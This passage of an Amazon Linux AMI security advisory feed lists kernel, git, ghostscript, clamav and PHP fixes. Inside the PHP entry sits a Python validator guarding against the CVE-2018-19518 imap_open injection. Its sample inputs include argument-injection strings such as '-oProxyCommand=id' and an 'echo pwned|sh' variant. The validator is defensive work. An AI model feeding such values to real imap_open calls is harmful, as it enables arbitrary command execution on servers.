</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16862" title="" id="CVE-2018-16862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18710" title="" id="CVE-2018-18710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19407" title="" id="CVE-2018-19407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" 
release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.88" release="72.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.88-72.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1136</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1136: important priority package update for git</title><issued date="2018-12-20 00:03:00" /><updated date="2018-12-20 23:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19486:
Git before 2.19.2 on Linux and UNIX executes commands from the current working directory (as if &#039;.&#039; were at the end of $PATH) in certain cases involving the run_command() API and run-command.c, because there was a dangerous change from execvp to execv during 2017.
1653143:
CVE-2018-19486 git: Improper handling of PATH allows for commands to be executed from the current directory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19486" title="" id="CVE-2018-19486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-all" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.5" release="1.60.amzn1" epoch="0" 
arch="noarch"><filename>Packages/git-bzr-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.5-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1137</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1137: important priority package update for ghostscript</title><issued date="2018-12-20 00:04:00" /><updated date="2018-12-20 23:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16509:
It was discovered that the ghostscript /invalidaccess checks fail under certain conditions. An attacker could possibly exploit this to bypass the -dSAFER protection and, for example, execute arbitrary shell commands via a specially crafted PostScript document.
1619748:
CVE-2018-16509 ghostscript: /invalidaccess bypass after failed restore (699654)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16509" title="" id="CVE-2018-16509" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1145</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1145: medium priority package update for kernel</title><issued date="2019-01-09 22:47:00" /><updated date="2019-01-12 03:25:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20169:
An issue was discovered in the Linux kernel before 4.19.9. The USB subsystem mishandles size checks during the reading of an extra descriptor, related to __usb_get_extra_descriptor in drivers/usb/core/usb.c.
1660385:
CVE-2018-20169 kernel: Mishandled size checks during the reading of an extra descriptor
CVE-2018-14625:
A flaw was found where an attacker may be able to perform an uncontrolled read of kernel memory from within a VM guest. A race condition between the connect() and close() functions may allow an attacker using the AF_VSOCK protocol to gather a 4-byte information leak, or possibly impersonate AF_VSOCK messages destined to other clients or leak kernel memory.
1619846:
CVE-2018-14625 kernel: use-after-free Read in vhost_transport_send_pkt
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14625" title="" id="CVE-2018-14625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20169" title="" id="CVE-2018-20169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1146</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1146: low priority package update for clamav</title><issued date="2019-01-09 22:56:00" /><updated date="2019-01-12 03:28:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15378:
CVE-2018-14682:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. There is an off-by-one error in the TOLOWER() macro for CHM decompression.
1610941:
CVE-2018-14682 libmspack: off-by-one error in the TOLOWER() macro for CHM decompression
CVE-2018-14681:
An issue was discovered in kwajd_read_headers in mspack/kwajd.c in libmspack before 0.7alpha. Bad KWAJ file header extensions could cause a one or two byte overwrite.
1610896:
CVE-2018-14681 libmspack: out-of-bounds write in kwajd_read_headers in mspack/kwajd.c
CVE-2018-14680:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. It does not reject blank CHM filenames.
1610934:
CVE-2018-14680 libmspack: off-by-one error in the CHM chunk number validity checks
CVE-2018-14679:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. There is an off-by-one error in the CHM PMGI/PMGL chunk number validity checks, which could lead to denial of service (uninitialized data dereference and application crash).
1610890:
CVE-2018-14679 libmspack: off-by-one error in the CHM PMGI/PMGL chunk number validity checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14679" title="" id="CVE-2018-14679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14680" title="" id="CVE-2018-14680" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14681" title="" id="CVE-2018-14681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14682" title="" id="CVE-2018-14682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15378" title="" id="CVE-2018-15378" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.100.2" release="2.35.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.100.2-2.35.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.100.2" 
release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.100.2" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.100.2-2.35.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.100.2" release="2.35.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.100.2-2.35.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamd" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.100.2-2.35.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.100.2" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.100.2-2.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1147</id><title>Amazon Linux AMI 
2014.03 - ALAS-2019-1147: medium priority package update for php56 php70 php71 php72</title><issued date="2019-01-09 22:58:00" /><updated date="2019-01-12 03:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19935:
ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.
1660525:
CVE-2018-19935 php: NULL pointer dereference in ext/imap/php_imap.c resulting in a denial of service
CVE-2018-19518:
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a &quot;-oProxyCommand&quot; argument.
1654228:
CVE-2018-19518 php: imap_open() allows running arbitrary shell commands via mailbox parameter
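Added illustration, not part of the advisory text or of the PHP project's code: the injection described for CVE-2018-19518 works because c-client takes the server name out of the {host...} field and places it on an rsh command line that it then splits on spaces, so a name that starts with a dash, or contains a space followed by one, reaches ssh as an option when rsh is a link to ssh. The fixed PHP releases behind these packages turn the rsh path off by default (new imap.enable_insecure_rsh INI setting), but an application that accepts a user-supplied IMAP server name should still refuse anything that is not a plain hostname or IPv4 literal before it reaches imap_open(). The names is_safe_imap_host, build_mailbox and SAMPLE_SERVER_NAMES below are invented for this example, and the sample inputs are constructed.

```python
import ipaddress
import re

# Constructed sample inputs (not from the advisory): strings a web form might
# hand to imap_open() as the IMAP server name.
SAMPLE_SERVER_NAMES = [
    "imap.example.com",                         # ordinary hostname
    "192.0.2.10",                               # IPv4 literal (RFC 5737 test range)
    "-oProxyCommand=id",                        # leading dash becomes an ssh option
    "x -oProxyCommand=echo\tpwned|sh",          # c-client splits on the space
    "imap.example.com:993/imap/ssl}INBOX",      # escapes the {host} field
    "",                                         # empty
]

# One DNS label: letters, digits, hyphen, 1..63 characters. Leading and
# trailing hyphens are checked separately to keep the regex simple.
_LABEL = re.compile(r"^[A-Za-z0-9-]{1,63}$")


def is_safe_imap_host(name: str) -> bool:
    """Return True only if name is a plain hostname or IPv4 literal that can be
    placed inside imap_open()'s {host...} field without becoming an rsh/ssh
    argument. Whitespace, a leading '-', and the c-client delimiters
    ':', '/', '{', '}' are all refused."""
    if not name or len(name) > 253:
        return False
    # c-client builds the rsh command line and splits it on spaces; a tab
    # survives inside an argument, so every kind of whitespace is rejected.
    if any(ch.isspace() for ch in name):
        return False
    # A leading dash is exactly how "-oProxyCommand=..." turns into an option.
    if name.startswith("-"):
        return False
    # IPv4 literals are accepted when they parse; anything else must be a
    # hostname made of valid labels (no ':' or '/' can pass the regex).
    try:
        ipaddress.IPv4Address(name)
        return True
    except ValueError:
        pass
    for label in name.rstrip(".").split("."):
        if not _LABEL.match(label):
            return False
        if label.startswith("-") or label.endswith("-"):
            return False
    return True


def build_mailbox(host: str, port: int = 993, mailbox: str = "INBOX") -> str:
    """Build an imap_open()-style mailbox spec from a validated host. The
    /norsh flag tells c-client never to attempt the rsh/ssh pre-authenticated
    path at all, as defence in depth on top of the host check."""
    if not is_safe_imap_host(host):
        raise ValueError("refusing untrusted IMAP server name: %r" % host)
    if port not in range(1, 65536):
        raise ValueError("port out of range: %r" % port)
    return "{%s:%d/imap/ssl/norsh}%s" % (host, port, mailbox)


def triage(names):
    """Map each candidate server name to whether it would be accepted."""
    return {n: is_safe_imap_host(n) for n in names}


if __name__ == "__main__":
    for name, ok in triage(SAMPLE_SERVER_NAMES).items():
        print("%-40r %s" % (name, "accept" if ok else "REJECT"))
    print(build_mailbox("imap.example.com"))
```

Only the first two sample names are accepted; the two -oProxyCommand variants and the field-escaping name are rejected before any mailbox string is built. The validation is the primary control here, since a server name that can close the {...} field early would also neutralise any /norsh flag appended after it.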
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518" title="" id="CVE-2018-19518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19935" title="" id="CVE-2018-19935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-gd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.33" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-enchant-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package 
name="php70-pspell" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.33" release="1.32.amzn1" epoch="0" 